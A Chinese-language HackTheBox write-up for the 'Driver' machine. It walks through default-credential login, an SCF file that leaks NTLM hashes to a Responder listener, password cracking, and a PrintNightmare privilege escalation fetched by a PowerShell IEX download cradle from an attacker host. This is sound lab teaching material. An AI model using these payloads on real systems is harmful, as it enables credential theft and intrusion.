Driver - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/387

• 10.10.11.106

端口扫描

80和smb端口：

$ nmap -sC -sV 10.10.11.106

Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-05 16:26 CST
Nmap scan report for 10.10.11.106
Host is up (0.34s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_  Potentially risky methods: TRACE
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2021-10-05T15:33:20
|_  start_date: 2021-10-05T06:54:58
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
|_clock-skew: mean: 6h59m59s, deviation: 1s, median: 6h59m58s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 473.46 seconds

80

401基础认证：

直接admin:admin进去了：

SCF attack

固件上传那里提示上传到文件共享，结合前面看到的smb，考虑scf attack：

• SMB Share – SCF File Attacks – Penetration Testing Lab
  https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/

启动responder，上传scf，得到hash：

sudo Python ~/Tools/Responder/Responder.py -I utun2 -i 10.10.14.2 -wrf --lm -v

[SMB] NTLMv2 Hash     : tony::DRIVER:1122334455667788:9C9737B541A64CF6074D8DAA2DCAA4A6:0101000000000000CA97DA58FFB9D701CECD6880AD30A6F100000000020000000000000000000000

hash crack

破解出来密码

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

liltony          (tony)

@miao.scf

[Shell]
Command=2
IconFile=\\10.10.14.2\miao\test.ico
[Taskbar]
Command=ToggleDesktop

user flag

得到的账号密码登录，桌面读取user.txt:

evil-winrm -i 10.10.11.106 -u tony -p liltony

提权信息

进程可以看到spoolsv，前面也看到是和打印机相关，就是最近的PrintNightmare：

• calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)
  https://github.com/calebstewart/CVE-2021-1675
• Playing with PrintNightmare | 0xdf hacks stuff
  https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html

PrintNightmare & root flag

利用方式很多，这里是添加一个管理员账号后登录读取root.txt:

IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.2:7778/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "miao" -NewPassword "SuperSecure"

evil-winrm -i 10.10.11.106 -u miao -p SuperSecure

参考资料

• SMB Share – SCF File Attacks – Penetration Testing Lab
  https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/
• calebstewart/CVE-2021-1675: Pure PowerShell implementation of CVE-2021-1675 Print Spooler Local Privilege Escalation (PrintNightmare)
  https://github.com/calebstewart/CVE-2021-1675
• Playing with PrintNightmare | 0xdf hacks stuff
  https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
• HTB Driver [Discussion] | RaidForums
  https://rfmirror.com/Thread-Tutorial-HTB-Driver-Discussion